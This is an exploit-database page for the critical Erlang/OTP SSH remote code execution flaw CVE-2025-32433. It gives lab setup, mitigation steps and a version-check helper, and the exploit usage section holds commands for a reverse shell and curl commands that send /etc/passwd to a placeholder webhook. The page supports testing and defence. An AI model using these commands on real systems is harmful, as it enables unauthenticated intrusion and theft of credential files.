Exploit for CVE-2025-32433

Vulnerability Details

Basic Information

Title Exploit for CVE-2025-32433
Type githubexploit
Published 2025-04-19T21:37:47
Last Seen 2025-04-20T15:04:23
CVSS Score 10.0 (CRITICAL)

CVSS v3 Details

Attack Vector NETWORK
Attack Complexity LOW
Privileges Required NONE
User Interaction NONE
Scope CHANGED
Confidentiality Impact HIGH
Integrity Impact HIGH
Availability Impact HIGH

CVE Information

CVE IDs CVE-2025-32433
CWE
Bulletin Family exploit

Description

# CVE-2025-32433 – Critical Erlang/OTP SSH Vulnerability

![SSH ERLANG EXPLOIT](image.png)

## Overview 🔍

CVE-2025-32433 is a critical vulnerability in Erlang/OTP's SSH implementation that allows **unauthenticated remote code execution**: specially crafted SSH messages sent before authentication completes let an attacker execute arbitrary code on the affected system.

* **What**: Remote Code Execution (RCE) via unauthenticated SSH messages in Erlang/OTP
* **Impact**: Full code execution, potentially as root, over the network
* **Affected**: Any system running an Erlang/OTP-based SSH server
* **Fix**: Upgrade to `OTP-27.3.3`, `OTP-26.2.5.11`, or `OTP-25.3.2.20`
* **Workaround**: Restrict SSH access using firewall rules

## Vulnerability Details ⚠️

Discovered by researchers at Ruhr University Bochum, this vulnerability stems from improper handling of SSH connection protocol messages in Erlang/OTP. It allows attackers to send maliciously crafted messages before authentication is completed, resulting in unauthenticated arbitrary code execution.

If the Erlang SSH daemon is running as root (a common configuration), successful exploitation grants full system control, making it a prime candidate for ransomware deployment, lateral movement through networks, or data exfiltration.

## Affected Versions 🐛

* <= OTP-27.3.2
* <= OTP-26.2.5.10
* <= OTP-25.3.2.19

## Lab Setup 🖥️

Follow these steps to set up a test environment:

1. **Install Docker and Docker Compose**

   ```bash
   sudo apt update
   sudo apt install apt-transport-https ca-certificates curl gnupg lsb-release
   curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
   sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable"
   sudo apt install docker-ce docker-ce-cli containerd.io
   sudo docker --version
   sudo curl -L "https://github.com/docker/compose/releases/download/v2.29.1/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose
   sudo chmod +x /usr/local/bin/docker-compose
   docker-compose --version
   ```

2. **Build and Run the Vulnerable Container**

   ```bash
   docker build -t erlang-ssh .
   docker run -d --name erlang-ssh-container -p 2222:2222 -v /home/local.txt:/home erlang-ssh
   ```

3. **Set Up as a Service**

   To run the container as a service that starts automatically:

   a. Create a systemd service file:

   ```bash
   sudo nano /etc/systemd/system/erlang-ssh-vuln.service
   ```

   b. Add the following content:

   ```ini
   [Unit]
   Description=Erlang SSH Vulnerability Lab
   After=docker.service
   Requires=docker.service

   [Service]
   TimeoutStartSec=0
   Restart=always
   ExecStartPre=-/usr/bin/docker stop erlang-ssh-container
   ExecStartPre=-/usr/bin/docker rm erlang-ssh-container
   ExecStart=/usr/bin/docker run --name erlang-ssh-container -p 2222:2222 -v /home/local.txt:/home erlang-ssh
   ExecStop=/usr/bin/docker stop erlang-ssh-container

   [Install]
   WantedBy=multi-user.target
   ```

   c. Enable and start the service:

   ```bash
   sudo systemctl daemon-reload
   sudo systemctl enable erlang-ssh-vuln.service
   sudo systemctl start erlang-ssh-vuln.service
   ```

## Exploit Usage 🚀

The exploit script provides several options for testing and exploiting the vulnerability:

### Basic Syntax:
```bash
python exploit.py [options]
```

### Check Vulnerability:
```bash
python exploit.py 172.32.33.28 -p 2222 --check
```

### Execute Command:
```bash
python exploit.py 172.32.33.28 -p 2222 -c 'ls -la'
```

### Get Reverse Shell:
```bash
python exploit.py 172.32.33.28 -p 2222 --shell --lhost 172.32.36.48 --lport 4444
```

### Alternative Data Exfiltration:
If direct commands don't work, you can use webhook-based exfiltration:
```bash
python exploit.py 172.32.33.28 -p 2222 -c "curl -X POST -d @/etc/passwd WEBHOOKURL"
```
```bash
python exploit.py 172.32.33.28 -p 2222 -c "curl -X POST -d @/home/local.txt WEBHOOKURL"
```

## Mitigation Steps 🛡️

1. **Update Erlang/OTP**:
   - Upgrade to `OTP-27.3.3`, `OTP-26.2.5.11`, or `OTP-25.3.2.20`
   - These patched versions properly validate SSH protocol messages

2. **Network Controls**:
   - Restrict access to SSH services with firewall rules
   - Implement network segmentation to isolate critical systems

3. **Monitoring**:
   - Deploy intrusion detection/prevention systems to monitor for exploitation attempts
   - Enable enhanced logging for SSH connections
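To turn step 1 into a repeatable inventory check, here is an added Python helper (not part of the exploit repository) that compares an OTP release string against the affected ranges and fixed releases listed on this page; the `FIXED_RELEASES` table, the `is_vulnerable` name and the sample inventory are assumptions constructed for this example.

```python
import re
from typing import Dict, Optional, Tuple

# Fixed releases named on this page, keyed by OTP major branch.
# Any release on the same branch that sorts below its fix is affected.
FIXED_RELEASES: Dict[int, Tuple[int, ...]] = {
    27: (27, 3, 3),
    26: (26, 2, 5, 11),
    25: (25, 3, 2, 20),
}

_VERSION_RE = re.compile(r"^(?:OTP-)?(\d+(?:\.\d+)*)$")


def parse_otp_version(text: str) -> Tuple[int, ...]:
    """Turn 'OTP-26.2.5.10' or '26.2.5.10' into the tuple (26, 2, 5, 10)."""
    match = _VERSION_RE.match(text.strip())
    if not match:
        raise ValueError(f"not an OTP version string: {text!r}")
    return tuple(int(part) for part in match.group(1).split("."))


def is_vulnerable(text: str) -> Optional[bool]:
    """True if the release sorts below its branch's fix, False if it is the
    fix or later, None when the page lists no fix for that major branch
    (treat None as 'unknown', not as 'safe')."""
    version = parse_otp_version(text)
    fixed = FIXED_RELEASES.get(version[0])
    if fixed is None:
        return None
    # Tuple comparison copes with shorter strings: (27, 3) < (27, 3, 3).
    return version < fixed


def triage(inventory: Dict[str, str]) -> Dict[str, str]:
    """Map host -> 'VULNERABLE' / 'PATCHED' / 'UNKNOWN' for a version inventory."""
    labels = {True: "VULNERABLE", False: "PATCHED", None: "UNKNOWN"}
    return {host: labels[is_vulnerable(ver)] for host, ver in inventory.items()}


if __name__ == "__main__":
    # Constructed sample inventory (hostnames and versions are made up).
    sample = {"rabbit-01": "OTP-26.2.5.10", "rabbit-02": "OTP-26.2.5.11",
              "couch-01": "OTP-25.3.2.19", "build-box": "OTP-24.3.4"}
    for host, status in triage(sample).items():
        print(f"{host:10} {status}")
```

The version string must come from the host's own OTP installation; the banner the Erlang SSH daemon advertises names the `ssh` application version, not the OTP release.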

Impact Assessment

Base Score 10.0
Severity CRITICAL
